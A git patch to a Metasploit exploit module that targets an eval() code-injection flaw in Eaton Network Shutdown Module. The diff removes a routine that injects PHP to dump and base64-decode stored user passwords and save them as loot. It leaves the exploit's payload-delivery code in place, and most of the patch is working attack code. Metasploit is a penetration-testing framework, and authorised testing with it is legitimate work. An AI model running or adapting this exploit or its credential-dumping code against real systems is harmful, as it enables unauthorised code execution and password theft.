From fd2296317dfb71f4f7b8cf8b7134ca24efe20954 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 28 Nov 2012 14:27:01 -0600 Subject: [PATCH] Strip the credential dumping stuff (making it auxiliary) Also a little description update --- .../multi/http/eaton_nsm_code_exec.rb | 64 ++++--------------- 1 file changed, 13 insertions(+), 51 deletions(-) diff --git a/modules/exploits/multi/http/eaton_nsm_code_exec.rb b/modules/exploits/multi/http/eaton_nsm_code_exec.rb index b1aeac8ed2..fe56105af3 100644 --- a/modules/exploits/multi/http/eaton_nsm_code_exec.rb +++ b/modules/exploits/multi/http/eaton_nsm_code_exec.rb @@ -18,12 +18,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Description' => %q{ This module exploits a vulnerability in lib/dbtools.inc which uses unsanitized user input inside a eval() call. Additionally the base64 encoded - user credentials are extracted from the database of the application. - + user credentials are extracted from the database of the application. Please + note that in order to be able to steal credentials, the vulnerable service + must have at least one USV module (an entry in the "nodes" table in mgedb.db) }, 'Author' => [ 'h0ng10' ], # original discovery, msf module 'License' => MSF_LICENSE, - 'Version' => '$Revision$', + 'Version' => '$Revision$', 'References' => [ ['OSVDB', '83199'], @@ -33,22 +34,20 @@ class Metasploit3 < Msf::Exploit::Remote { 'DisableNops' => true, 'Space' => 4000, - 'Keys' => ['php'] + 'Keys' => ['php'] }, - 'Platform' => ['php'], - 'Arch' => ARCH_PHP, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, - 'Targets' => [[ 'Automatic', { }]], + 'Targets' => [[ 'Automatic', { }]], 'DefaultTarget' => 0, - 'Privileged' => true, + 'Privileged' => true, 'DisclosureDate' => 'Jun 26 2012' - )) + )) register_options( [ - Opt::RPORT(4679), - OptBool.new('READ_CREDS', [ true, 'Extract credentials from the target db', true ]), - + Opt::RPORT(4679) ], self.class) end @@ -65,42 +64,6 @@ class Metasploit3 < Msf::Exploit::Remote return CheckCode::Safe end - def read_credentials() - pattern = rand_text_numeric(10) - users_var = rand_text_alpha(10) - user_var = rand_text_alpha(10) - php = <<-EOT - $#{users_var} = &queryDB("SELECT * FROM configUsers;"); - foreach($#{users_var} as $#{user_var}) { - print "#{pattern}" .$#{user_var}["login"]."#{pattern}".base64_decode($#{user_var}["pwd"])."#{pattern}"; - } die(); - EOT - - print_status("Reading user credentials from the database") - response = execute_php_code(php) - - if not response or response.code != 200 then - print_error("Failed: Error requesting page") - return - end - - credentials = response.body.to_s.scan(/\d{10}(.*)\d{10}(.*)\d{10}/) - - return if credentials.length == 0 - print_status("Got #{credentials.length} record(s):") - cred_txt = "#Username:Password\n" - credentials.each do |record| - print_status("Username: #{record[0]}, Password: #{record[1]}") - cred_txt << "#{record[0]}:#{record[1]}\n" - end - - loot_name = "eaton.nsm.credentials" - loot_type = "text/plain" - loot_filename = "eaton_nsm_creds.txt" - loot_desc = "Eaton Network Shutdown Module credentials" - store_loot(loot_name, loot_type, datastore['RHOST'], cred_txt, loot_filename, loot_desc) - end - def execute_php_code(code, opts = {}) param_name = rand_text_alpha(6) padding = rand_text_alpha(6) @@ -123,13 +86,12 @@ class Metasploit3 < Msf::Exploit::Remote { 'Connection' => 'Close', } - }, 5) + }) res end def exploit - read_credentials unless datastore['READ_CREDS'] == false - print_status("Sending payload") + print_status("#{rhost}:#{rport} - Sending payload") execute_php_code(payload.encoded) handler end